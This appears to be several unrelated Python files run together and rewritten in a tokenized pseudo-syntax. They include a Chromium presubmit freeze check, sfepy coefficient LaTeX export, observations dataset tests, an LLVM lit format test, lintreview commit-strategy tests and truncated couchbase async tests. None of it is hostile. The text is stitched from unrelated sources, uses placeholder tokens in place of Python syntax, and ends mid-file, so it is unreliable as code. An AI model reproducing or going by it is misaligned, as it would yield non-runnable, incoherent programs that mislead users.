# Copyright 2018 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Enforces luci-milo.cfg consistency. See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts for more details on the presubmit API built into depot_tools. """<line_sep>PRESUBMIT_VERSION='2.0.0'<line_sep>USE_PYTHON3=<true><line_sep>_IGNORE_FREEZE_FOOTER='Ignore-Freeze'<line_sep># The time module's handling of timezones is abysmal, so the boundaries are # precomputed in UNIX time _FREEZE_START=1639641600# 2021/12/16 00:00 -0800 _FREEZE_END=1641196800# 2022/01/03 00:00 -0800 <def_stmt>CheckFreeze input_api output_api<block_start><if_stmt>_FREEZE_START<le>input_api.time.time()<l>_FREEZE_END<block_start>footers=input_api.change.GitFootersFromDescription()<if_stmt>_IGNORE_FREEZE_FOOTER<not><in>footers<block_start><def_stmt>convert t<block_start>ts=input_api.time.localtime(t)<line_sep><return>input_api.time.strftime('%Y/%m/%d %H:%M %z' ts)<block_end><return>[output_api.PresubmitError('There is a prod freeze in effect from {} until {},'<concat>' files in //infra/config cannot be modified'.format(convert(_FREEZE_START) convert(_FREEZE_END)))]<block_end><block_end><return>[]<block_end><def_stmt>CheckTests input_api output_api<block_start>glob=input_api.os_path.join(input_api.PresubmitLocalPath() '*_test.py')<line_sep>tests=input_api.canned_checks.GetUnitTests(input_api output_api input_api.glob(glob) run_on_python2=<false> run_on_python3=<true> skip_shebang_check=<true>)<line_sep><return>input_api.RunTests(tests)<block_end><def_stmt>CheckLintLuciMilo input_api output_api<block_start><if_stmt>('infra/config/generated/luci/luci-milo.cfg'<in>input_api.LocalPaths()<or>'infra/config/lint-luci-milo.py'<in>input_api.LocalPaths())<block_start><return>input_api.RunTests([input_api.Command(name='lint-luci-milo' cmd=[input_api.python_executable 'lint-luci-milo.py'] kwargs={} message=output_api.PresubmitError) ])<block_end><return>[]<block_end><def_stmt>CheckTestingBuildbot input_api output_api<block_start><if_stmt>('infra/config/generated/luci/luci-milo.cfg'<in>input_api.LocalPaths()<or>'infra/config/generated/luci/luci-milo-dev.cfg'<in>input_api.LocalPaths())<block_start><return>input_api.RunTests([input_api.Command(name='testing/buildbot config checks' cmd=[input_api.python_executable input_api.os_path.join('..' '..' 'testing' 'buildbot' 'generate_buildbot_json.py' ) '--check'] kwargs={} message=output_api.PresubmitError) ])<block_end><return>[]<block_end><def_stmt>CheckLucicfgGenOutputMain input_api output_api<block_start><return>input_api.RunTests(input_api.canned_checks.CheckLucicfgGenOutput(input_api output_api 'main.star'))<block_end><def_stmt>CheckLucicfgGenOutputDev input_api output_api<block_start><return>input_api.RunTests(input_api.canned_checks.CheckLucicfgGenOutput(input_api output_api 'dev.star'))<block_end><def_stmt>CheckChangedLUCIConfigs input_api output_api<block_start><return>input_api.canned_checks.CheckChangedLUCIConfigs(input_api output_api)<block_end># Footer indicating a CL that is trying to address an outage by some mechanism # other than those in infra/config/outages _OUTAGE_ACTION_FOOTER='Infra-Config-Outage-Action'<line_sep># Footer acknowledging that an outages configuration is in effect when making an # unrelated change _IGNORE_OUTAGE_FOOTER='Infra-Config-Ignore-Outage'<def_stmt>CheckOutagesConfigOnCommit input_api output_api<block_start>outages_pyl=input_api.os_path.join(input_api.PresubmitLocalPath() 'generated/outages.pyl')<with_stmt>open(outages_pyl)<as>f<block_start>outages_config=input_api.ast.literal_eval(f.read())<block_end><if_stmt><not>outages_config<block_start>footers=input_api.change.GitFootersFromDescription()<line_sep><return>[output_api.PresubmitError('There is no outages configuration in effect, '<concat>'please remove the {} footer from your CL description.'.format(footer))<for>footer (_OUTAGE_ACTION_FOOTER _IGNORE_OUTAGE_FOOTER)<if>footer<in>footers]<block_end># Any of the config files under infra/config/outages outages_config_files=set()<line_sep># Any of the config files under infra/config/generated generated_config_files=set()<line_sep># Any config files that are not under infra/config/outages or # infra/config/generated config_files=set()<for_stmt>p input_api.LocalPaths()<block_start><if_stmt>p<in>('README.md' 'OWNERS')<block_start><continue><block_end><if_stmt>p.startswith('infra/config/outages/')<block_start>outages_config_files.add(p)<line_sep><continue><block_end><if_stmt>p.startswith('infra/config/generated/')<block_start>generated_config_files.add(p)<line_sep><continue><block_end>config_files.add(p)<block_end># If the only changes to non-generated config fies were the outages files, # assume the change was addressing an outage and that no additional mechanism # needs to be added <if_stmt>outages_config_files<and><not>config_files# REVIEWER: Should we prevent the footers from being here in this case? <block_start><return>[]<block_end># If any non-generated, non-outages files were modified or if the generated # config files were modified without any config files being modified (lucicfg # change, etc.) then make sure the user knows that when the outages # configuration is disabled, the generated configuration may change <if_stmt>config_files<or>generated_config_files<block_start>footers=input_api.change.GitFootersFromDescription()<line_sep>has_action_footer=_OUTAGE_ACTION_FOOTER<in>footers<line_sep>has_ignore_footer=_IGNORE_OUTAGE_FOOTER<in>footers<if_stmt>has_action_footer<and>has_ignore_footer<block_start><return>[output_api.PresubmitError('Only one of {} or {} should be present in your CL description'.format(_OUTAGE_ACTION_FOOTER _IGNORE_OUTAGE_FOOTER)) ]<block_end><if_stmt><not>has_action_footer<and><not>has_ignore_footer<block_start>outages_config_lines=['{}: {}'.format(k v)<for>k,v sorted(outages_config.items())]<line_sep><return>[output_api.PresubmitError('\n'.join(['The following outages configuration is in effect:\n {}'.format('\n '.join(outages_config_lines)) ('The effect of your change may not be visible '<concat>'in the generated configuration.') ('If your change is addressing the outage, '<concat>'please add the footer {} with a link for the outage.').format(_OUTAGE_ACTION_FOOTER) ('If your change is not addressing the outage '<concat>'but you still wish to land it, please add the footer '<concat>'{} with a reason.').format(_IGNORE_OUTAGE_FOOTER) ('For more information on outages configuration, '<concat>'see https://chromium.googlesource.com/chromium/src/+/HEAD/infra/config/outages') ])) ]<block_end><block_end><return>[]<block_end>
<import_from_future_stmt> absolute_import<import_stmt>numpy<as>nm<import_from_stmt>sfepy.base.base ordered_iteritems Struct basestr<import_from_stmt>sfepy.base.ioutils read_dict_hdf5 write_dict_hdf5<import_from_stmt>sfepy.homogenization.utils iter_sym<import_stmt>six<import_from_stmt>six.moves range<def_stmt>coef_arrays_to_dicts idict format='%s/%d'<block_start>out={}<for_stmt>k,v six.iteritems(idict)<block_start><if_stmt>isinstance(v list)<block_start>out.update({format%(k ii):vv<for>ii,vv enumerate(v)})<block_end><else_stmt><block_start>out[k]=v<block_end><block_end><return>out<block_end><class_stmt>Coefficients(Struct)<block_start>""" Class for storing (homogenized) material coefficients. """<def_stmt>from_file_hdf5 filename<block_start>obj=Coefficients()<line_sep>obj.__dict__=read_dict_hdf5(filename)<for_stmt>key,val six.iteritems(obj.__dict__)<block_start><if_stmt>type(val)<eq>list<block_start><for_stmt>ii,vv enumerate(val)<block_start>val[ii]=nm.array(vv dtype=nm.float64)<block_end><block_end><block_end><return>obj<block_end>from_file_hdf5=staticmethod(from_file_hdf5)<def_stmt>to_file_hdf5 self filename<block_start>write_dict_hdf5(filename self.__dict__)<block_end><def_stmt>_escape_latex self txt<block_start><return>txt.replace('_' '\_').replace('%' '\%')<block_end><def_stmt>_format self val<block_start>out=self._a_format%val<if_stmt>self._a_cdot<block_start>a1,a2=out.split('e')<if_stmt>(self._a_filter<is><not><none>)<and>(int(a2)<l>self._a_filter)<block_start>out='0'<block_end><else_stmt><block_start>out='%s \cdot 10^{%s}'%(a1 int(a2))<block_end><block_end><return>out<block_end><def_stmt>_write1d self fd val<block_start>fd.write(r' \begin{equation}')<line_sep>fd.write('\n')<line_sep>fd.write(r' \left[')<line_sep>fd.write('\n')<line_sep>fd.write(', '.join([self._format(vv)<for>vv val]))<line_sep>fd.write('\n')<line_sep>fd.write(r' \right]')<line_sep>fd.write('\n')<line_sep>fd.write(r' \end{equation}')<line_sep>fd.write('\n')<block_end><def_stmt>_write2d self fd val<block_start>fd.write(r' \begin{equation}')<line_sep>fd.write('\n')<line_sep>fd.write(r' \left[\begin{array}{%s}'%('c'<times>val.shape[0]))<line_sep>fd.write('\n')<for_stmt>ir range(val.shape[1])<block_start><for_stmt>ic range(val.shape[0])<block_start>fd.write(' '+self._format(val[ir ic]))<if_stmt>ic<l>(val.shape[0]-1)<block_start>fd.write(r' & ')<block_end><elif_stmt>ir<l>(val.shape[1]-1)<block_start>fd.write(r' \\')<line_sep>fd.write('\n')<block_end><block_end><block_end>fd.write('\n')<line_sep>fd.write(r' \end{array}\right]')<line_sep>fd.write('\n')<line_sep>fd.write(r' \end{equation}')<line_sep>fd.write('\n')<block_end><def_stmt>_save_dict_latex self adict fd names idx=<none><block_start>fd.write(r'\begin{itemize}')<line_sep>fd.write('\n')<for_stmt>key,val ordered_iteritems(adict)<block_start><if_stmt>key.startswith('_a_')<block_start><continue><block_end><try_stmt><block_start>lname=names[key]<block_end><except_stmt><block_start>lname=self._escape_latex(key)<block_end>fd.write('\item %s:'%lname)<line_sep>fd.write('\n')<if_stmt>isinstance(val list)<block_start><if_stmt>idx<is><not><none><block_start>val=val[idx]<block_end><else_stmt><block_start><raise>NotImplementedError("'idx' must be set in the case "<concat>"of multi-coefficients!")<block_end><block_end><if_stmt>isinstance(val dict)<block_start>self._save_dict_latex(val fd names)<block_end><elif_stmt>isinstance(val basestr)<block_start>fd.write(self._escape_latex(val)+'\n')<block_end><elif_stmt>isinstance(val float)<block_start>fd.write('$'+self._format(val)+'$\n')<block_end><elif_stmt>isinstance(val nm.ndarray)<block_start><if_stmt>val.ndim<eq>0<block_start>fd.write('$'+self._format(val)+'$\n')<block_end><elif_stmt>val.ndim<eq>1<block_start>self._write1d(fd val)<block_end><elif_stmt>val.ndim<eq>2<block_start>self._write2d(fd val)<block_end><block_end><else_stmt><block_start>fd.write('%s'%val)<block_end><block_end>fd.write(r'\end{itemize}')<line_sep>fd.write('\n\n')<block_end><def_stmt>to_file_latex self filename names format='%.2e' cdot=<false> filter=<none> idx=<none><block_start>r""" Save the coefficients to a file in LaTeX format. Parameters ---------- filename : str The name of the output file. names : dict Mapping of attribute names to LaTeX names. format : str Format string for numbers. cdot : bool For '%.e' formats only. If True, replace 'e' by LaTeX '\cdot 10^{exponent}' format. filter : int For '%.e' formats only. Typeset as 0, if exponent is less than `filter`. idx : int For multi-coefficients, set the coefficient index. """<line_sep>self._a_format=format<line_sep>self._a_cdot=cdot<line_sep>self._a_filter=filter<line_sep>fd=open(filename 'w')<line_sep>self._save_dict_latex(self.__dict__ fd names idx)<line_sep>fd.close()<block_end><def_stmt>_save_dict self adict fd names format<block_start>toremove=[]<line_sep>adict_complex={}<for_stmt>key,val ordered_iteritems(adict)<block_start><if_stmt>hasattr(val 'dtype')<and>nm.issubdtype(val.dtype nm.complexfloating)<block_start>adict_complex[key+'_real']=val.real<line_sep>adict_complex[key+'_imag']=val.imag<line_sep>toremove.append(key)<block_end><block_end><for_stmt>key toremove<block_start><del_stmt>(adict[key])<block_end>adict.update(adict_complex)<for_stmt>key,val ordered_iteritems(adict)<block_start><try_stmt><block_start>lname=names[key]<block_end><except_stmt><block_start>lname=key<block_end>fd.write('%s:\n'%lname)<if_stmt>hasattr(val 'to_file_txt')<block_start><if_stmt>val.to_file_txt<is><not><none><block_start>val.to_file_txt(fd format val)<block_end><else_stmt><block_start>fd.write('--\n')<block_end><block_end><elif_stmt>isinstance(val dict)<block_start>self._save_dict(val fd names format)<line_sep>fd.write('\n')<block_end><elif_stmt>isinstance(val list)<block_start><if_stmt>isinstance(val[0] basestr)<block_start>fd.write('\n'.join(val)+'\n')<block_end><block_end><elif_stmt>isinstance(val basestr)<block_start>fd.write(val+'\n')<block_end><elif_stmt>isinstance(val float)<block_start>fd.write('%e\n'%val)<block_end><elif_stmt>isinstance(val nm.ndarray)<block_start><if_stmt>val.ndim<eq>0<block_start>fd.write(format%val)<line_sep>fd.write('\n')<block_end><elif_stmt>val.ndim<eq>1<block_start><for_stmt>ic range(val.shape[0])<block_start>fd.write(format%val[ic])<if_stmt>ic<l>(val.shape[0]-1)<block_start>fd.write(', ')<block_end><else_stmt><block_start>fd.write('\n')<block_end><block_end><block_end><elif_stmt>val.ndim<eq>2<block_start><for_stmt>ir range(val.shape[0])<block_start><for_stmt>ic range(val.shape[1])<block_start>fd.write(format%val[ir ic])<if_stmt>ic<l>(val.shape[1]-1)<block_start>fd.write(', ')<block_end><elif_stmt>ir<l>(val.shape[0]-1)<block_start>fd.write(';\n')<block_end><block_end><block_end>fd.write('\n')<block_end><elif_stmt>val.ndim<eq>3<block_start><for_stmt>ii range(val.shape[0])<block_start>fd.write(' step %d:\n'%ii)<for_stmt>ir range(val.shape[1])<block_start><for_stmt>ic range(val.shape[2])<block_start>fd.write(' '+format%val[ii ir ic])<if_stmt>ic<l>(val.shape[2]-1)<block_start>fd.write(', ')<block_end><elif_stmt>ir<l>(val.shape[1]-1)<block_start>fd.write(';\n')<block_end><block_end><block_end>fd.write('\n')<block_end>fd.write('\n')<block_end><block_end><else_stmt><block_start>fd.write('--\n')<block_end>fd.write('\n')<block_end><block_end><def_stmt>to_file_txt self filename names format<block_start>fd=open(filename 'w')<line_sep>self._save_dict(coef_arrays_to_dicts(self.__dict__) fd names format)<line_sep>fd.close()<block_end>_table_vector=r""" \begin{center} \begin{tabular}{cc} i & value \\ %s \end{tabular} \end{center} """<line_sep>_table_matrix_1=r""" \begin{center} \begin{tabular}{cc} ij & value \\ %s \end{tabular} \end{center} """<line_sep>_table_matrix_2=r""" \begin{center} \begin{tabular}{cc} ijkl & value \\ %s \end{tabular} \end{center} """<line_sep>_itemize=r""" \begin{itemize} %s \end{itemize} """<line_sep>## # c: 09.07.2008, r: 09.07.2008 <def_stmt>_typeset self val dim style='table' format='%f' step=<none><block_start>sym=(dim+1)<times>dim<floordiv>2<line_sep>mode=<none><if_stmt>val.ndim<eq>0<block_start>mode='scalar'<block_end><elif_stmt>val.ndim<eq>1<block_start><if_stmt>val.shape[0]<eq>1<block_start>mode='scalar'<block_end><elif_stmt>val.shape[0]<eq>dim<block_start>mode='vector'<block_end><elif_stmt>val.shape[0]<eq>sym<block_start>mode='matrix_t1d'<block_end><block_end><elif_stmt>val.ndim<eq>2<block_start><if_stmt>val.shape[0]<eq>dim<block_start>mode='matrix_2D'<block_end><elif_stmt>val.shape[0]<eq>sym<block_start>mode='matrix_t2d'<block_end><block_end>out=''<if_stmt>mode<eq>'scalar'<block_start>out=format%val<block_end><elif_stmt>mode<eq>'vector'<block_start>aux=' \\\\\n'.join([r'$_%d$ & %s'%(ir+1 format%val[ir])<for>ir range(dim)])<line_sep>out=self._table_vector%aux<block_end><elif_stmt>mode<eq>'matrix_t1d'<block_start>aux=' \\\\\n'.join([r'$_{%d%d}$ & %s'%(ir+1 ic+1 format%val[ii])<for>ii,(ir ic) enumerate(iter_sym(dim))])<line_sep>out=self._table_matrix_1%aux<block_end><elif_stmt>mode<eq>'matrix_2D'<block_start>aux=' \\\\\n'.join([r'$_{%d%d}$ & %s'%(ir+1 ic+1 format%val[ir ic])<for>ir range(dim)<for>ic range(dim)])<line_sep>out=self._table_matrix_1%aux<block_end><elif_stmt>mode<eq>'matrix_t2d'<block_start>aux=' \\\\\n'.join([r'$_{%d%d%d%d}$ & %s'%(irr+1 irc+1 icr+1 icc+1 format%val[ii jj])<for>ii,(irr irc) enumerate(iter_sym(dim))<for>jj,(icr icc) enumerate(iter_sym(dim))])<line_sep>out=self._table_matrix_2%aux<block_end><return>out<block_end><def_stmt>to_latex self attr_name dim style='table' format='%f' step=<none><block_start>val=getattr(self attr_name)<if_stmt>step<is><not><none><block_start>val=val[step]<block_end><if_stmt>isinstance(val dict)<block_start>aux=''<for_stmt>key,dval six.iteritems(val)<block_start>aux2=r'\item %s : %s'%(key self._typeset(dval dim style format step))<line_sep>aux='\n'.join((aux aux2))<block_end>out=self._itemize%aux<block_end><else_stmt><block_start>out=self._typeset(val dim style format step)<block_end><return>out<block_end><block_end>
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>shutil<import_stmt>sys<import_stmt>tempfile<import_from_stmt>observations.r.pension pension<def_stmt>test_pension <block_start>"""Test module pension.py by downloading pension.csv and testing shape of extracted data has 194 rows and 19 columns """<line_sep>test_path=tempfile.mkdtemp()<line_sep>x_train,metadata=pension(test_path)<try_stmt><block_start><assert_stmt>x_train.shape<eq>(194 19)<block_end><except_stmt><block_start>shutil.rmtree(test_path)<line_sep><raise>()<block_end><block_end>
# -*- coding: utf-8 -*- <import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>csv<import_stmt>numpy<as>np<import_stmt>os<import_stmt>sys<import_from_stmt>observations.util maybe_download_and_extract<def_stmt>randu path<block_start>"""Random Numbers from Congruential Generator RANDU 400 triples of successive random numbers were taken from the VAX FORTRAN function RANDU running under VMS 1.5. A data frame with 400 observations on 3 variables named `x`, `y` and `z` which give the first, second and third random number in the triple. <NAME> Args: path: str. Path to directory which either stores file or otherwise file will be downloaded and extracted there. Filename is `randu.csv`. Returns: Tuple of np.ndarray `x_train` with 400 rows and 3 columns and dictionary `metadata` of column headers (feature names). """<import_stmt>pandas<as>pd<line_sep>path=os.path.expanduser(path)<line_sep>filename='randu.csv'<if_stmt><not>os.path.exists(os.path.join(path filename))<block_start>url='http://dustintran.com/data/r/datasets/randu.csv'<line_sep>maybe_download_and_extract(path url save_file_name='randu.csv' resume=<false>)<block_end>data=pd.read_csv(os.path.join(path filename) index_col=0 parse_dates=<true>)<line_sep>x_train=data.values<line_sep>metadata={'columns':data.columns}<line_sep><return>x_train metadata<block_end>
# Check the various features of the ShTest format. # # RUN: rm -f %t.xml # RUN: not %{lit} -j 1 -v %{inputs}/shtest-format --xunit-xml-output %t.xml > %t.out # RUN: FileCheck < %t.out %s # RUN: FileCheck --check-prefix=XUNIT < %t.xml %s # END. # CHECK: -- Testing: # CHECK: PASS: shtest-format :: argv0.txt # CHECK: FAIL: shtest-format :: external_shell/fail.txt # CHECK-NEXT: *** TEST 'shtest-format :: external_shell/fail.txt' FAILED *** # CHECK: Command Output (stdout): # CHECK-NEXT: -- # CHECK-NEXT: line 1: failed test output on stdout # CHECK-NEXT: line 2: failed test output on stdout # CHECK: Command Output (stderr): # CHECK-NEXT: -- # CHECK-NEXT: cat{{(\.exe)?}}: {{cannot open does-not-exist|does-not-exist: No such file or directory}} # CHECK: -- # CHECK: FAIL: shtest-format :: external_shell/fail_with_bad_encoding.txt # CHECK-NEXT: *** TEST 'shtest-format :: external_shell/fail_with_bad_encoding.txt' FAILED *** # CHECK: Command Output (stdout): # CHECK-NEXT: -- # CHECK-NEXT: a line with bad encoding: # CHECK: -- # CHECK: PASS: shtest-format :: external_shell/pass.txt # CHECK: FAIL: shtest-format :: fail.txt # CHECK-NEXT: *** TEST 'shtest-format :: fail.txt' FAILED *** # CHECK-NEXT: Script: # CHECK-NEXT: -- # CHECK-NEXT: printf "line 1 # CHECK-NEXT: false # CHECK-NEXT: -- # CHECK-NEXT: Exit Code: 1 # # CHECK: Command Output (stdout): # CHECK-NEXT: -- # CHECK-NEXT: $ ":" "RUN: at line 1" # CHECK-NEXT: $ "printf" # CHECK-NEXT: # command output: # CHECK-NEXT: line 1: failed test output on stdout # CHECK-NEXT: line 2: failed test output on stdout # CHECK: UNRESOLVED: shtest-format :: no-test-line.txt # CHECK: PASS: shtest-format :: pass.txt # CHECK: UNSUPPORTED: shtest-format :: requires-missing.txt # CHECK: PASS: shtest-format :: requires-present.txt # CHECK: UNRESOLVED: shtest-format :: requires-star.txt # CHECK: UNSUPPORTED: shtest-format :: requires-triple.txt # CHECK: PASS: shtest-format :: unsupported-expr-false.txt # CHECK: UNSUPPORTED: shtest-format :: unsupported-expr-true.txt # CHECK: UNRESOLVED: shtest-format :: unsupported-star.txt # CHECK: UNSUPPORTED: shtest-format :: unsupported_dir/some-test.txt # CHECK: PASS: shtest-format :: xfail-expr-false.txt # CHECK: XFAIL: shtest-format :: xfail-expr-true.txt # CHECK: XFAIL: shtest-format :: xfail-feature.txt # CHECK: XFAIL: shtest-format :: xfail-target.txt # CHECK: XFAIL: shtest-format :: xfail.txt # CHECK: XPASS: shtest-format :: xpass.txt # CHECK-NEXT: *** TEST 'shtest-format :: xpass.txt' FAILED *** # CHECK-NEXT: Script # CHECK-NEXT: -- # CHECK-NEXT: true # CHECK-NEXT: -- # CHECK: Testing Time # CHECK: Unexpected Passing Tests (1) # CHECK: shtest-format :: xpass.txt # CHECK: Failing Tests (3) # CHECK: shtest-format :: external_shell/fail.txt # CHECK: shtest-format :: external_shell/fail_with_bad_encoding.txt # CHECK: shtest-format :: fail.txt # CHECK: Expected Passes : 7 # CHECK: Expected Failures : 4 # CHECK: Unsupported Tests : 4 # CHECK: Unresolved Tests : 3 # CHECK: Unexpected Passes : 1 # CHECK: Unexpected Failures: 3 # XUNIT: <?xml version="1.0" encoding="UTF-8" ?> # XUNIT-NEXT: <testsuites> # XUNIT-NEXT: <testsuite name="shtest-format" tests="22" failures="7" skipped="4"> # XUNIT: <testcase classname="shtest-format.shtest-format" name="argv0.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.external_shell" name="fail.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase classname="shtest-format.external_shell" name="fail_with_bad_encoding.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase classname="shtest-format.external_shell" name="pass.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="fail.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase classname="shtest-format.shtest-format" name="no-test-line.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase classname="shtest-format.shtest-format" name="pass.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-missing.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT:<skipped message="Skipping because of: a-missing-feature" /> # XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-present.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-star.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase classname="shtest-format.shtest-format" name="requires-triple.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT:<skipped message="Skipping because of: x86_64" /> # XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-expr-false.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-expr-true.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT:<skipped message="Skipping because of configuration." /> # XUNIT: <testcase classname="shtest-format.shtest-format" name="unsupported-star.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: <testcase classname="shtest-format.unsupported_dir" name="some-test.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT:<skipped message="Skipping because of configuration." /> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-expr-false.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-expr-true.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-feature.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail-target.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xfail.txt" time="{{[0-9]+\.[0-9]+}}"/> # XUNIT: <testcase classname="shtest-format.shtest-format" name="xpass.txt" time="{{[0-9]+\.[0-9]+}}"> # XUNIT-NEXT: <failure{{[ ]*}}> # XUNIT: </failure> # XUNIT-NEXT: </testcase> # XUNIT: </testsuite> # XUNIT-NEXT: </testsuites>
<import_stmt>sys<line_sep>log_file_path=sys.argv[1]<with_stmt>open(log_file_path)<as>f<block_start>lines=f.readlines()<block_end><for_stmt>line lines# Ignore errors from CPU instruction set, symbol existing testing, # or compilation error formatting <block_start>ignored_keywords=['src.c' 'CheckSymbolExists.c' 'test_compilation_error_formatting' ]<if_stmt>all([keyword<not><in>line<for>keyword ignored_keywords])<block_start>print(line)<block_end><block_end>
<import_from_stmt>unittest TestCase<import_from_stmt>lintreview.fixers.commit_strategy CommitStrategy<import_from_stmt>lintreview.fixers.error WorkflowError<import_from_stmt>mock patch Mock sentinel<import_from_stmt>..test_git setup_repo teardown_repo clone_path<class_stmt>TestCommitStrategy(TestCase)<block_start><def_stmt>setUp self<block_start>setup_repo()<block_end><def_stmt>tearDown self<block_start>teardown_repo()<block_end><def_stmt>test_init_key_requirements self<block_start>keys=('repo_path' 'author_email' 'author_name' 'pull_request')<line_sep>values=('some/path' 'lintbot' '<EMAIL>' 'pull#1')<for_stmt>key keys<block_start>context=dict(zip(keys values))<del_stmt>context[key]<line_sep>self.assertRaises(KeyError CommitStrategy context)<block_end><block_end>@patch('lintreview.git.commit')@patch('lintreview.git.push')@patch('lintreview.git.apply_cached')<def_stmt>test_execute__push_error self mock_apply mock_push mock_commit<block_start>mock_push.side_effect=IOError('! [remote rejected] stylefixes -> add_date_to_obs '<concat>'(permission denied)\nerror: failed to push some refs to')<line_sep>mock_pull=Mock(head_branch='patch-1' from_private_fork=<false> maintainer_can_modify=<true>)<line_sep>context={'repo_path':clone_path 'author_name':'lintbot' 'author_email':'<EMAIL>' 'pull_request':mock_pull}<line_sep>strategy=CommitStrategy(context)<line_sep>diff=Mock()<line_sep>diff.as_diff.return_value=sentinel.diff<line_sep>self.assertRaises(WorkflowError strategy.execute [diff])<block_end>@patch('lintreview.git.commit')@patch('lintreview.git.push')@patch('lintreview.git.apply_cached')<def_stmt>test_execute__git_flow self mock_apply mock_push mock_commit<block_start>mock_pull=Mock(head_branch='patch-1' from_private_fork=<false> maintainer_can_modify=<true>)<line_sep>context={'repo_path':clone_path 'author_name':'lintbot' 'author_email':'<EMAIL>' 'pull_request':mock_pull}<line_sep>strategy=CommitStrategy(context)<line_sep>diff=Mock()<line_sep>diff.as_diff.return_value=sentinel.diff<line_sep>out=strategy.execute([diff])<line_sep>self.assertIsNone(out)<line_sep>mock_commit.assert_called_with(clone_path 'lintbot <<EMAIL>>' 'Fixing style errors.')<line_sep>mock_push.assert_called_with(clone_path 'origin' 'stylefixes:patch-1')<line_sep>mock_apply.assert_called_with(clone_path sentinel.diff)<block_end>@patch('lintreview.git.commit')<def_stmt>test_execute__no_maintainer_modify self mock_commit<block_start>mock_pull=Mock(head_branch='patch-1' maintainer_can_modify=<false> from_private_fork=<false>)<line_sep>context={'repo_path':clone_path 'author_name':'lintbot' 'author_email':'<EMAIL>' 'pull_request':mock_pull}<line_sep>strategy=CommitStrategy(context)<line_sep>diff=Mock()<line_sep>diff.as_diff.return_value=sentinel.diff<with_stmt>self.assertRaises(WorkflowError)<as>err<block_start>strategy.execute([diff])<block_end>self.assertIn('Cannot apply automatic fixing' str(err.exception))<line_sep>self.assertIn('modified by maintainers' str(err.exception))<line_sep>self.assertEqual(0 mock_commit.call_count)<block_end>@patch('lintreview.git.commit')<def_stmt>test_execute__private_fork self mock_commit<block_start>mock_pull=Mock(head_branch='patch-1' maintainer_can_modify=<true> from_private_fork=<true>)<line_sep>context={'repo_path':clone_path 'author_name':'lintbot' 'author_email':'<EMAIL>' 'pull_request':mock_pull}<line_sep>strategy=CommitStrategy(context)<line_sep>diff=Mock()<line_sep>diff.as_diff.return_value=sentinel.diff<with_stmt>self.assertRaises(WorkflowError)<as>err<block_start>strategy.execute([diff])<block_end>self.assertIn('Cannot apply automatic fixing' str(err.exception))<line_sep>self.assertIn('private fork' str(err.exception))<line_sep>self.assertEqual(0 mock_commit.call_count)<block_end><block_end>
<import_stmt>asyncio<import_from_stmt>couchbase.asynchronous AsyncSearchResult<import_from_stmt>couchbase.asynchronous AsyncAnalyticsResult<import_from_stmt>.fixtures asynct AioTestCase<import_from_stmt>couchbase.exceptions CouchbaseException SearchException NotSupportedException<import_from_stmt>unittest SkipTest<import_stmt>couchbase.search<as>SEARCH<class_stmt>CouchbaseBeerTest(AioTestCase)<block_start><def_stmt>setUp self **kwargs<block_start><try_stmt><block_start><return>super(CouchbaseBeerTest self).setUp(bucket='beer-sample' **kwargs)<block_end><except_stmt>CouchbaseException<block_start><raise>SkipTest("Need 'beer-sample' bucket for this")<block_end><block_end><block_end><class_stmt>CouchbaseBeerKVTest(CouchbaseBeerTest)<block_start><def_stmt>setUp self<block_start>super(CouchbaseBeerKVTest self).setUp()<block_end>@asynct@asyncio.coroutine<def_stmt>test_get_data self<block_start>connargs=self.make_connargs(bucket='beer-sample')<line_sep>beer_default_collection=self.gen_collection(**connargs)<line_sep><yield><from>(beer_default_collection.on_connect()<or>asyncio.sleep(0.01))<line_sep>data=<yield><from>beer_default_collection.get('21st_amendment_brewery_cafe')<line_sep>self.assertEqual("21st Amendment Brewery Cafe" data.content["name"])<block_end><block_end><class_stmt>CouchbaseBeerViewTest(CouchbaseBeerTest)<block_start><def_stmt>setUp self<block_start>super(CouchbaseBeerViewTest 